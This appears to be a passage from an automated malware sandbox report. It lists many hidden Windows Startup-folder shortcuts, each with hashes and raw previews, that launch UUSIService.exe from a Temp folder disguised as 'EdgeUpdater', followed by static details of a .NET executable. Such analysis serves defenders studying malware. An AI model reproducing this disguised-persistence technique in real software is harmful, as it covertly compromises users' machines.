Preview:	L..................F...."....!.......!......0h.......j.......................:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8.....................N..E.d.g.e.U.p.d.a.t.e.r.....n.2..j..KY5B".EDGEUP~1.EXE..R......KY6BKY6B...........................0.E.d.g.e.U.p.d.a.t.e.r.s...e.x.e.......p...............-.......o...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe..9.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.E.d.g.e.U.p.d.a.t.e.r.s...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e9fb1908f1054881b6ffc228f98a913e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:33 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9248565656767145
Encrypted:	false
SSDEEP:	24:8Z5HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8vHfNDp2l9tJRBzfNZ47/yg
MD5:	93B9087F85DCC9EC025633B52DD23F51
SHA1:	0EFAC1675778C93E087237086AB18BCA1EDDB8D1
SHA-256:	BF701CFB58B747A4FB9122BF19A1D25B02FF6521CE353D22CBABD233078F78EB
SHA-512:	68A6D4F47392A4E21422031E0A998781C57CF1B8AD2B5A440FA1914865C647A5010A200F4739095C03EF135015377569194ABC3416A53B0FBE11FBF3DF6822AE
Malicious:	false
Preview:	L..................F...."...........U..)....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f2ea87e99e2943ffad3d0eb01596b467.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:08 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.918217333870884
Encrypted:	false
SSDEEP:	24:8ZGHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8gHfNDp2l9tJRBzfNZ47/yg
MD5:	4BBDF7CB9EAD55A3AC0B2B9D6D8F3C4B
SHA1:	6A70FE1D29F85E0E3AEE8006AC6DA652F79A3AF3
SHA-256:	84D6CAFADCD865EF06FB8C7567095313D6557AD954B3F221568E866AA914A592
SHA-512:	E03F2E57B67F6F98E3A73BDAC8D4AD2086540BBE3B2135EC99CAB10C97D2B732BE8FB554F7E020FBB6709BC0380AFDA8DD4C44FD55894538CF2471B65D32B258
Malicious:	false
Preview:	L..................F...."............I......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f36dc9efa98a4e41aa28ba7a861ca173.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:32 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927915162131801
Encrypted:	false
SSDEEP:	24:8ZSHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8gHfNDp2l9tJRBzfNZ47/yg
MD5:	BFB5E49E908CE4CB3D037B98D55ED0E1
SHA1:	91DE2D80E60F7965500CECA81E92877C632B57E7
SHA-256:	D36E0B49870B68B20DDC6DDE73BF769D6FEE7AAD75C81E96D4F495E4A9B941EB
SHA-512:	0369D520D75B11ABEE9A2C0824C3B05E52FA99AFFAAA38CBBFD881391EFADA1B7B45036786ACDE19CF269A72D2B66810EE12B3FD009C799C7884AFF6BD43B095
Malicious:	false
Preview:	L..................F...."............O?)....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f6ba4aa9c38840bcb1dc8c1cd1b1a57d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:50 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924235061942729
Encrypted:	false
SSDEEP:	24:8ZcHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8WHfNDp2l9tJRBzfNZ47/yg
MD5:	724C78F968850B35665094C9A9D4B900
SHA1:	ADC0A9D7411D4CCFD463BABAFDC3CA0B50A89621
SHA-256:	D7C9A4F26F7B4DA8E745AD30E38BC0E432467A0A1711ADB2F89F88208D9D52E8
SHA-512:	137ECE0C020C7F8A9E2D134D4689800D4BE7C22EEB16FAC4025F327E9F683EDFC0FD78DBCF8A9469341974F73E4D47897CB37211E7345BE01D1039AFBB742B48
Malicious:	false
Preview:	L..................F...."............G.3....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f827da91bc664cdc9ece459a3d1c468a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:30 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922391732616844
Encrypted:	false
SSDEEP:	24:8ZTLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8dHfNDp2l9tJRBzfNZ47/yg
MD5:	9D32802BC34131D6D1DA78011FEF5F46
SHA1:	D2ED7F8DB6754A9A6DCAD21F843EB0EA006D84DE
SHA-256:	A8E9189B01BBE75AEC383FE7F2B5600760F095C9F14C95F11D92CA0CD8DD7DE2
SHA-512:	C8F16942C6AD1CE5FBF42E9C2C1190FB7F5A8F8CD451052F533A72D9F11BFE0325CBB18633D320E9DCD14878387D9E28F4D524F9C1B0206CEB381DDFE283901E
Malicious:	false
Preview:	L..................F...."............I.(....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fa81cc20db9049868ae7912824615f1b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:41 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9222243135554695
Encrypted:	false
SSDEEP:	24:8ZxLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8TLHfNDp2l9tJRBzfNZ47/yg
MD5:	65ED7C93EE69528776CDE9032F7F58E2
SHA1:	332832FE945613C776B0DE8F5E9FFE059EBD3D3E
SHA-256:	00CA2B89078042CBFD8F71BF2A6B85D627655DBB113E5D5D43EBFE9B8B114F29
SHA-512:	D830F129ECC35E5F8D82BA6F0A579C805AB9667A225B908E255D4F73890B88F7BA788DCAAA6F58472A5D1CBBF235EB1DF3E30AC9213A9D5C6C7FB2392A272F0D
Malicious:	false
Preview:	L..................F...."............uW.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fb44e82f4f5e4531b4172029272f087a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:17 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925689661685822
Encrypted:	false
SSDEEP:	24:8Z6H8Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8IH8Dp2l9tJRBzfNZ47/yg
MD5:	48E1C339BDF205012B796CDDCF7D58E0
SHA1:	2D74A81EC1D6F3A847EB35EC8452D0A448139B72
SHA-256:	5863B460900EDD5B8E4B422F7D0DF445F59AB5E8059CA10FB3941D7380A5AE95
SHA-512:	89512B387D387CA11E3A1F1855974A1BCDCA690A25170EBAB5A18A011C2B829055229DF9C91F3828D96D25FD44559DD182E18D8F57C34ADD6831CA03E377DA88
Malicious:	false
Preview:	L..................F...."..............C....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........@w.C........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fbbb4b72220c46fb93732c2a706405ab.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:32 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924943017858062
Encrypted:	false
SSDEEP:	24:8ZNHICcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8vHICcDp2l9tJRBzfNZ47/yg
MD5:	1FBF3A9A2E1D7F45553D181C48B5D073
SHA1:	81122DEFDE79748FCAD9F0ECB9FD827C127BEA02
SHA-256:	1D2A6364951B980D66B5F1481CD8B58A038D172B472D8256CCD46CDB609F9DB3
SHA-512:	F9A0AA19409BB3AD4612492A7447272CA97E2B4AA03317BEAA2232709499D4BB55BE9354DDF12D27B35A311632B3D1B91C14976D3C3EEA767D4F6C69E8F22797
Malicious:	false
Preview:	L..................F...."..............L....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............,L........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fe8e200076cc49cdb8a438b434fa52d9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:33 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927609606409588
Encrypted:	false
SSDEEP:	24:8ZRLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8rLHfNDp2l9tJRBzfNZ47/yg
MD5:	49AA860ACC028B1AD7F28DFCB12E7CD1
SHA1:	DCDB38C328DE54B0CA00811B678EE1E6429CCA3C
SHA-256:	1D0330744D60622153FAF9A89CAB87785F2961FEA99DC8D97AC54639AD3E0AFF
SHA-512:	AF55549D724CB60602336209D7E0A2CC25D8FBB82624E0E44AB002B2BFBE286D2CD867B8F95EDFAF0C718A23AF51BBD88BB64E00EEE5CEF7790EFF15804EA7DB
Malicious:	false
Preview:	L..................F...."..............)....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fea9c32cf061495787bf3801120df355.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:03 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927796378016062
Encrypted:	false
SSDEEP:	24:8ZmHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:80HfNDp2l9tJRBzfNZ47/yg
MD5:	83A2723A3458AB950BCADEB2059652E2
SHA1:	C568497BA742AFA35E684803309EB58B817EB509
SHA-256:	180D451CDCB04EC2A19E9585779FDFF6C59E9066C1A2E73ADEF1F577B44780A3
SHA-512:	C1CA20088567801D55C5B9DAB2F278BA5336E6FD7C776090B5E44CE7A8E05AE951F3B3A9D822DABD0ADB0DA8E0A518AF7E6BB17C98C35A7C2628C1E6AC9AEEDC
Malicious:	false
Preview:	L..................F...."...........T.......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_ff1130bea1ca4cbba936ff475f6f4c49.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:24 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923602297900681
Encrypted:	false
SSDEEP:	24:8ZQLHVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8OLHVDp2l9tJRBzfNZ47/yg
MD5:	47306CE240AB8EE6C29F3E265828792A
SHA1:	7970BC1EAAA68634980E8278F75A56744AB3AAE4
SHA-256:	A31E63632DA9645F7140C84B8B6B215824D26A90EACC09A8FD561FD540C7317A
SHA-512:	04ADE0EC8D151DC9391BA904BA6D7C2DD7B87276CAAFAD1E3E5B92A35C2DC94EF70482DE2845D7C25E0C7300A8A87CD3814F4FA6E1FCF7FFFDFC1550FCD3AC61
Malicious:	false
Preview:	L..................F...."...........O.=H....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........Z..G........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_ff13f93ecae54136a80bee031bd9011e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:48 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924645979793251
Encrypted:	false
SSDEEP:	24:8Z8WHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8yWHfNDp2l9tJRBzfNZ47/yg
MD5:	7FF799967F9188D3C02F2AFEFCA8FE9B
SHA1:	113040FBDF759F5AEA5E4A85584236485DD4D0BF
SHA-256:	96B09BBF79A9016171A09046ACB473E7A41C6E4C96A8B010977283B49DCE3035
SHA-512:	8440B1843E3034739582CDDA86B1FB950AEFDD528336B3E9A728B233B6EBC11B25FF9B1EF5E6373E2C9B161AD3A7F3F3CBF3EDD177084D8EC0F6828B69CA8493
Malicious:	false
Preview:	L..................F...."...........I.......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.522639333280876
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Yc9hcFC1ux.exe
File size:	27'136 bytes
MD5:	0e926b28fc49f6259a70c032ae83cd14
SHA1:	abb5856b3853cfe4ecc5e25ff1a7aa605afac007
SHA256:	3088b0302d4b38c63ef4fead57aa6049da2cc62bf9f4a5d9331552c84fe516e6
SHA512:	1f4306c38e6604f3945a4d1215576ee81514c34757318035d9220fb81da5bb4f39d23b8a22f404902fe3e67f0326a1f9ff45dc6ce8d3a41a69aab54de488fb77
SSDEEP:	384:BvV0KF7OERZOTPx3hd/N7az/bCKQIRB1F7M9ekamfrqEjDEFCFUa0gW71JBr:B9LZOTPxNG5z7uTqVCFUa0gWR
TLSH:	EFC2078826DC8837EE9F1FBCDC6252130772C257DA11F70E48CCE1D42A567865A8D2AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..`...........~... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x407e1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
